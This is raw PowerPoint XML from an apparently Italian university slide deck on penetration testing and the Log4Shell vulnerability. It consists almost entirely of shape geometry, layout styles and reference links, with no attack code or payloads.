                  <a:cubicBezTo>
                    <a:pt x="3872006" y="866538"/>
                    <a:pt x="3729694" y="376466"/>
                    <a:pt x="3467973" y="1974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5F9FD94-99CC-42AD-8E66-CF99E8FD5A94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8729240" y="9274"/>
              <a:ext cx="3462454" cy="3010961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2953507 w 3462454"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3010961"/>
                <a:gd name="connsiteX1" fmla="*/ 477652 w 3462454"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 3010961"/>
                <a:gd name="connsiteX2" fmla="*/ 327396 w 3462454"/>
                <a:gd name="connsiteY2" fmla="*/ 113681 h 3010961"/>
                <a:gd name="connsiteX3" fmla="*/ 46554 w 3462454"/>
                <a:gd name="connsiteY3" fmla="*/ 391785 h 3010961"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 3462454"/>
                <a:gd name="connsiteY4" fmla="*/ 453516 h 3010961"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 3462454"/>
                <a:gd name="connsiteY5" fmla="*/ 2083461 h 3010961"/>
                <a:gd name="connsiteX6" fmla="*/ 26382 w 3462454"/>
                <a:gd name="connsiteY6" fmla="*/ 2118637 h 3010961"/>
                <a:gd name="connsiteX7" fmla="*/ 101620 w 3462454"/>
                <a:gd name="connsiteY7" fmla="*/ 2222744 h 3010961"/>
                <a:gd name="connsiteX8" fmla="*/ 1494064 w 3462454"/>
                <a:gd name="connsiteY8" fmla="*/ 3010961 h 3010961"/>
                <a:gd name="connsiteX9" fmla="*/ 2551110 w 3462454"/>
                <a:gd name="connsiteY9" fmla="*/ 2526044 h 3010961"/>
                <a:gd name="connsiteX10" fmla="*/ 2679751 w 3462454"/>
                <a:gd name="connsiteY10" fmla="*/ 2429754 h 3010961"/>
                <a:gd name="connsiteX11" fmla="*/ 3264840 w 3462454"/>
                <a:gd name="connsiteY11" fmla="*/ 1926383 h 3010961"/>
                <a:gd name="connsiteX12" fmla="*/ 3462454 w 3462454"/>
                <a:gd name="connsiteY12" fmla="*/ 1385790 h 3010961"/>
                <a:gd name="connsiteX13" fmla="*/ 3018820 w 3462454"/>
                <a:gd name="connsiteY13" fmla="*/ 67626 h 3010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62454" h="3010961">
                  <a:moveTo>
                    <a:pt x="2953507" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477652" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327396" y="113681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222344" y="200626"/>
                    <a:pt x="128536" y="293564"/>
                    <a:pt x="46554" y="391785"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="453516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2083461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26382" y="2118637"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51135" y="2152065"/>
                    <a:pt x="76235" y="2186586"/>
                    <a:pt x="101620" y="2222744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489585" y="2775245"/>
                    <a:pt x="906035" y="3010961"/>
                    <a:pt x="1494064" y="3010961"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1879987" y="3010961"/>
                    <a:pt x="2163144" y="2818935"/>
                    <a:pt x="2551110" y="2526044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2594452" y="2493317"/>
                    <a:pt x="2637795" y="2460984"/>
                    <a:pt x="2679751" y="2429754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2907158" y="2260282"/>
                    <a:pt x="3121914" y="2100194"/>
                    <a:pt x="3264840" y="1926383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3401480" y="1760224"/>
                    <a:pt x="3462454" y="1593511"/>
                    <a:pt x="3462454" y="1385790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3462454" y="865148"/>
                    <a:pt x="3304918" y="397028"/>
                    <a:pt x="3018820" y="67626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7D3E70-A759-410D-B5DB-855218E138C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8243247" y="9274"/>
              <a:ext cx="3948447" cy="3411460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3564894 w 3904481"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3411460"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 3904481"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 3411460"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 3904481"/>
                <a:gd name="connsiteY2" fmla="*/ 2659993 h 3411460"/>
                <a:gd name="connsiteX3" fmla="*/ 1876 w 3904481"/>
                <a:gd name="connsiteY3" fmla="*/ 2662425 h 3411460"/>
                <a:gd name="connsiteX4" fmla="*/ 1514161 w 3904481"/>
                <a:gd name="connsiteY4" fmla="*/ 3411460 h 3411460"/>
                <a:gd name="connsiteX5" fmla="*/ 2797788 w 3904481"/>
                <a:gd name="connsiteY5" fmla="*/ 2801744 h 3411460"/>
                <a:gd name="connsiteX6" fmla="*/ 2954004 w 3904481"/>
                <a:gd name="connsiteY6" fmla="*/ 2680673 h 3411460"/>
                <a:gd name="connsiteX7" fmla="*/ 3664508 w 3904481"/>
                <a:gd name="connsiteY7" fmla="*/ 2047754 h 3411460"/>
                <a:gd name="connsiteX8" fmla="*/ 3904481 w 3904481"/>
                <a:gd name="connsiteY8" fmla="*/ 1368033 h 3411460"/>
                <a:gd name="connsiteX9" fmla="*/ 3596499 w 3904481"/>
                <a:gd name="connsiteY9" fmla="*/ 52268 h 341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4481" h="3411460">
                  <a:moveTo>
                    <a:pt x="3564894" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2659993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1876" y="2662425"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="424055" y="3184544"/>
                    <a:pt x="889346" y="3411460"/>
                    <a:pt x="1514161" y="3411460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1982808" y="3411460"/>
                    <a:pt x="2326661" y="3170014"/>
                    <a:pt x="2797788" y="2801744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2850420" y="2760595"/>
                    <a:pt x="2903054" y="2719940"/>
                    <a:pt x="2954004" y="2680673"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3230156" y="2467586"/>
                    <a:pt x="3490946" y="2266297"/>
                    <a:pt x="3664508" y="2047754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3830437" y="1838832"/>
                    <a:pt x="3904481" y="1629214"/>
                    <a:pt x="3904481" y="1368033"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3904481" y="877057"/>
                    <a:pt x="3796872" y="423228"/>
                    <a:pt x="3596499" y="52268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0302A25-2D4F-4AD5-B0E9-C12184C3599E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="1355238"/>
            <a:ext cx="4381339" cy="5510713"/>
            <a:chOff x="0" y="1347287"/>
            <a:chExt cx="4259808" cy="551071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227AF03-773A-4B1E-8FED-67198038E60D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1676545"/>
              <a:ext cx="4174269" cy="5181455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1155130 w 4174269"/>
                <a:gd name="connsiteY0" fmla="*/ 990 h 5181455"/>
                <a:gd name="connsiteX1" fmla="*/ 2396955 w 4174269"/>
                <a:gd name="connsiteY1" fmla="*/ 367328 h 5181455"/>
                <a:gd name="connsiteX2" fmla="*/ 3827960 w 4174269"/>
                <a:gd name="connsiteY2" fmla="*/ 4749328 h 5181455"/>
                <a:gd name="connsiteX3" fmla="*/ 3561502 w 4174269"/>
                <a:gd name="connsiteY3" fmla="*/ 5090948 h 5181455"/>
                <a:gd name="connsiteX4" fmla="*/ 3452726 w 4174269"/>
                <a:gd name="connsiteY4" fmla="*/ 5181455 h 5181455"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 4174269"/>
                <a:gd name="connsiteY5" fmla="*/ 5181455 h 5181455"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 4174269"/>
                <a:gd name="connsiteY6" fmla="*/ 251605 h 5181455"/>
                <a:gd name="connsiteX7" fmla="*/ 157396 w 4174269"/>
                <a:gd name="connsiteY7" fmla="*/ 182600 h 5181455"/>
                <a:gd name="connsiteX8" fmla="*/ 1155130 w 4174269"/>
                <a:gd name="connsiteY8" fmla="*/ 990 h 518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74269" h="5181455">
                  <a:moveTo>
                    <a:pt x="1155130" y="990"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1564667" y="12730"/>
                    <a:pt x="1984593" y="129250"/>
                    <a:pt x="2396955" y="367328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3871760" y="1218807"/>
                    <a:pt x="4678347" y="3276416"/>
                    <a:pt x="3827960" y="4749328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748235" y="4887417"/>
                    <a:pt x="3658928" y="4998272"/>
                    <a:pt x="3561502" y="5090948"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3452726" y="5181455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5181455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="251605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157396" y="182600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475610" y="54980"/>
                    <a:pt x="811718" y="-8854"/>
                    <a:pt x="1155130" y="990"/>
                  </a:cubicBez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D6FE8FAD-8A4A-49E1-AFAF-A074482295A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1347287"/>
              <a:ext cx="4259808" cy="5510713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 948905 w 4259808"/>
                <a:gd name="connsiteY0" fmla="*/ 1556 h 5510713"/>
                <a:gd name="connsiteX1" fmla="*/ 2304106 w 4259808"/>
                <a:gd name="connsiteY1" fmla="*/ 405867 h 5510713"/>
                <a:gd name="connsiteX2" fmla="*/ 3890982 w 4259808"/>
                <a:gd name="connsiteY2" fmla="*/ 5156588 h 5510713"/>
                <a:gd name="connsiteX3" fmla="*/ 3680329 w 4259808"/>
                <a:gd name="connsiteY3" fmla="*/ 5445948 h 5510713"/>
                <a:gd name="connsiteX4" fmla="*/ 3616504 w 4259808"/>
                <a:gd name="connsiteY4" fmla="*/ 5510713 h 5510713"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 4259808"/>
                <a:gd name="connsiteY5" fmla="*/ 5510713 h 5510713"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 4259808"/>
                <a:gd name="connsiteY6" fmla="*/ 144797 h 5510713"/>
                <a:gd name="connsiteX7" fmla="*/ 164164 w 4259808"/>
                <a:gd name="connsiteY7" fmla="*/ 92266 h 5510713"/>
                <a:gd name="connsiteX8" fmla="*/ 948905 w 4259808"/>
                <a:gd name="connsiteY8" fmla="*/ 1556 h 5510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9808" h="5510713">
                  <a:moveTo>
                    <a:pt x="948905" y="1556"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1395136" y="16867"/>
                    <a:pt x="1853354" y="145625"/>
                    <a:pt x="2304106" y="405867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3916211" y="1336616"/>
                    <a:pt x="4808028" y="3568218"/>
                    <a:pt x="3890982" y="5156588"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3826502" y="5268272"/>
                    <a:pt x="3756052" y="5363347"/>
                    <a:pt x="3680329" y="5445948"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3616504" y="5510713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5510713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="144797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164164" y="92266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="418657" y="23914"/>
                    <a:pt x="681631" y="-7614"/>
                    <a:pt x="948905" y="1556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0A7C4DFB-FDFD-4F28-8B00-287EB75C79EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1592806"/>
              <a:ext cx="4029221" cy="5265194"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 812878 w 4029221"/>
                <a:gd name="connsiteY0" fmla="*/ 840 h 5265194"/>
                <a:gd name="connsiteX1" fmla="*/ 960980 w 4029221"/>
                <a:gd name="connsiteY1" fmla="*/ 1442 h 5265194"/>
                <a:gd name="connsiteX2" fmla="*/ 2216856 w 4029221"/>
                <a:gd name="connsiteY2" fmla="*/ 376120 h 5265194"/>
                <a:gd name="connsiteX3" fmla="*/ 3687427 w 4029221"/>
                <a:gd name="connsiteY3" fmla="*/ 4778650 h 5265194"/>
                <a:gd name="connsiteX4" fmla="*/ 3267677 w 4029221"/>
                <a:gd name="connsiteY4" fmla="*/ 5245601 h 5265194"/>
                <a:gd name="connsiteX5" fmla="*/ 3237167 w 4029221"/>
                <a:gd name="connsiteY5" fmla="*/ 5265194 h 5265194"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 4029221"/>
                <a:gd name="connsiteY6" fmla="*/ 5265194 h 5265194"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 4029221"/>
                <a:gd name="connsiteY7" fmla="*/ 162790 h 5265194"/>
                <a:gd name="connsiteX8" fmla="*/ 58408 w 4029221"/>
                <a:gd name="connsiteY8" fmla="*/ 139352 h 5265194"/>
                <a:gd name="connsiteX9" fmla="*/ 812878 w 4029221"/>
                <a:gd name="connsiteY9" fmla="*/ 840 h 52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29221" h="5265194">
                  <a:moveTo>
                    <a:pt x="812878" y="840"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="862065" y="-449"/>
                    <a:pt x="911443" y="-258"/>
                    <a:pt x="960980" y="1442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1374507" y="15631"/>
                    <a:pt x="1799140" y="134952"/>
                    <a:pt x="2216856" y="376120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3710806" y="1238652"/>
                    <a:pt x="4537261" y="3306696"/>
                    <a:pt x="3687427" y="4778650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3567917" y="4985647"/>
                    <a:pt x="3426282" y="5131074"/>
                    <a:pt x="3267677" y="5245601"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3237167" y="5265194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5265194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="162790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58408" y="139352"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301661" y="55163"/>
                    <a:pt x="554646" y="7607"/>
                    <a:pt x="812878" y="840"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="19050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6E867DF-0B62-429A-A554-CBE585048439}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2147333"/>
              <a:ext cx="3702048" cy="4710667"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1057511 w 3702048"/>
                <a:gd name="connsiteY0" fmla="*/ 1243 h 4710667"/>
                <a:gd name="connsiteX1" fmla="*/ 2139959 w 3702048"/>
                <a:gd name="connsiteY1" fmla="*/ 324180 h 4710667"/>
                <a:gd name="connsiteX2" fmla="*/ 3407455 w 3702048"/>
                <a:gd name="connsiteY2" fmla="*/ 4118750 h 4710667"/>
                <a:gd name="connsiteX3" fmla="*/ 2754080 w 3702048"/>
                <a:gd name="connsiteY3" fmla="*/ 4690965 h 4710667"/>
                <a:gd name="connsiteX4" fmla="*/ 2711405 w 3702048"/>
                <a:gd name="connsiteY4" fmla="*/ 4710667 h 4710667"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 3702048"/>
                <a:gd name="connsiteY5" fmla="*/ 4710667 h 4710667"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 3702048"/>
                <a:gd name="connsiteY6" fmla="*/ 239601 h 4710667"/>
                <a:gd name="connsiteX7" fmla="*/ 72857 w 3702048"/>
                <a:gd name="connsiteY7" fmla="*/ 203063 h 4710667"/>
                <a:gd name="connsiteX8" fmla="*/ 1057511 w 3702048"/>
                <a:gd name="connsiteY8" fmla="*/ 1243 h 4710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2048" h="4710667">
                  <a:moveTo>
                    <a:pt x="1057511" y="1243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1413932" y="13473"/>
                    <a:pt x="1779927" y="116316"/>
                    <a:pt x="2139959" y="324180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3427605" y="1067603"/>
                    <a:pt x="4139931" y="2850064"/>
                    <a:pt x="3407455" y="4118750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3235777" y="4416105"/>
                    <a:pt x="3011128" y="4566048"/>
                    <a:pt x="2754080" y="4690965"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2711405" y="4710667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4710667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="239601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72857" y="203063"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="383165" y="61024"/>
                    <a:pt x="715942" y="-10476"/>
                    <a:pt x="1057511" y="1243"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="158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4296" y="3420734"/>
            <a:ext cx="6665976" cy="2129674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr sz="4800" cap="none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E197B67B-BA44-4D2A-B31D-35A89323C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54296" y="6170490"/>
            <a:ext cx="5713314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1D718595-24D3-4517-A62E-C1F493407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54295" y="5550408"/>
            <a:ext cx="6665975" cy="512064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l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C6217BB-A228-414D-92D9-E1D1EFEB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40080" y="6170491"/>
            <a:ext cx="2840083" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E72EB70D-CD01-44DA-83B3-8FEB3383D307}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/2/2022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190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024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30290" y="2438399"/>
            <a:ext cx="4160520" cy="3657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C1D6427-F07F-4D50-B151-455100AF7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58CFD-9357-46BE-A189-D637A67C8730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79EFBB2-C5E0-4D57-AB1D-3AA907ECF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AE6B7E1-F60B-4D08-9052-423D6FBFA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280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1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130000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="18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0241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30290" y="2456408"/>
            <a:ext cx="4160520" cy="823912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="99000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" kern="1200" cap="all" spc="150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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="930"/>
              </a:spcBef>
              <a:buFont typeface="Corbel" panose="020B0503020204020204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30290" y="3316639"/>
            <a:ext cx="4160520" cy="277936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771BF97-4D2A-43A4-8CDC-2250017EB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4742EE-B331-4632-BD10-A82FED6B6FC0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6020661A-DA07-4679-9226-945B5DD24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EFCE38B-E087-4988-BC3A-FE3B55E70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D3BC439C-E995-4E1F-8DE9-75C32785E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5841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F30096C-3491-4EF2-ABB2-D57F3F4B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A835-D13F-49F4-8F11-5D576AC65FAD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9DA3A85-7147-4F32-944A-B079AF51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EDDF50D-95C0-4DA2-BBC6-41774FAC1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68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09BEFCA-6D6F-4F26-823F-C86CA69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1799-ACB5-4CB2-86A2-5C574F1C8706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2EE2C9-E87D-4495-9EDA-6BC0EDC27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5557A9-903F-4B36-8B06-D9EADF230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757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640080"/>
            <a:ext cx="3227715" cy="2551751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0160" y="640080"/>
            <a:ext cx="6949440" cy="5455919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BB904BE8-2080-4FFA-9239-A8929E28FA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ED5DD0D6-7A82-473E-879B-C6ECD6CCCFEC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D5580C6-5CD7-4CDD-977D-0533C84F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949440" cy="457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18D0320-9B66-443F-8E28-8BCF07E08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572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  <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="9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1C2A9DB-B176-4069-8734-5B4ED352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6488" y="6170491"/>
            <a:ext cx="2214322" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D4605E03-BC17-41A7-854C-DFAB672737DC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430F9A2F-C2C4-4E1C-B4B3-07ED84F28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80160" y="6170490"/>
            <a:ext cx="6464410" cy="45720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F9BFA0A0-2117-4A10-9DAA-080C21559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47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0240" y="442220"/>
            <a:ext cx="8770571" cy="1345269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="109728" tIns="109728" rIns="109728" bIns="9144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0240" y="2312276"/>
            <a:ext cx="8770571" cy="3651504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="109728" tIns="109728" rIns="109728" bIns="9144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50727" y="6170491"/>
            <a:ext cx="2840083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r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C4408324-A84C-4A45-93B6-78D079CCE772}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/2/2022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0240" y="6170490"/>
            <a:ext cx="5667375" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="109728" tIns="109728" rIns="109728" bIns="91440" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1100" spc="1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53744" y="6170490"/>
            <a:ext cx="1188720" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="109728" tIns="109728" rIns="109728" bIns="91440" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="16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algn="l"/>
            <a:fld id="{FAEF9944-A4F6-4C59-AEBD-678D6480B8EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" title="Rule Line">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430127AE-B29E-4FDF-99D2-A2F1E7003F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="2176009"/>
            <a:ext cx="8770571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048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14" r:id="rId5"/>
    <p:sldLayoutId id="2147483719" r:id="rId6"/>
    <p:sldLayoutId id="2147483715" r:id="rId7"/>
    <p:sldLayoutId id="2147483716" r:id="rId8"/>
    <p:sldLayoutId id="2147483717" r:id="rId9"/>
    <p:sldLayoutId id="2147483718" r:id="rId10"/>
    <p:sldLayoutId id="2147483720" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" b="1" kern="1200" spc="1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800" b="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None/>
        <a:defRPr sz="16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0" indent="-320040" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="140000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="930"/>
        </a:spcBef>
        <a:buFont typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1400" i="1" kern="1200" spc="15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.google.it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logging.apache.org/log4j/2.x/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE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Y8a5nB-vy78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DF95D4-C7AA-7E36-95CC-DBC53F2F5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63124" y="138270"/>
            <a:ext cx="6674886" cy="1790037"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" dirty="0"/>
              <a:t> testing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" dirty="0" err="1"/>
              <a:t>ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" dirty="0"/>
              <a:t> hacking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3F75DF0-845F-0480-8C04-8EA0EB892E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4674" y="3067187"/>
            <a:ext cx="5617794" cy="1150937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Log4Shell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6B109-5626-3482-BBAC-ECC71F7836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984" r="9304" b="-1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089B976-5406-B27C-48ED-44A2B60B37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524000" cy="1524000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155D77-C21F-434A-FDD9-407C5B93BB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168736" y="5357005"/>
            <a:ext cx="429675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  <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Anno Accademico 2021/2022</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
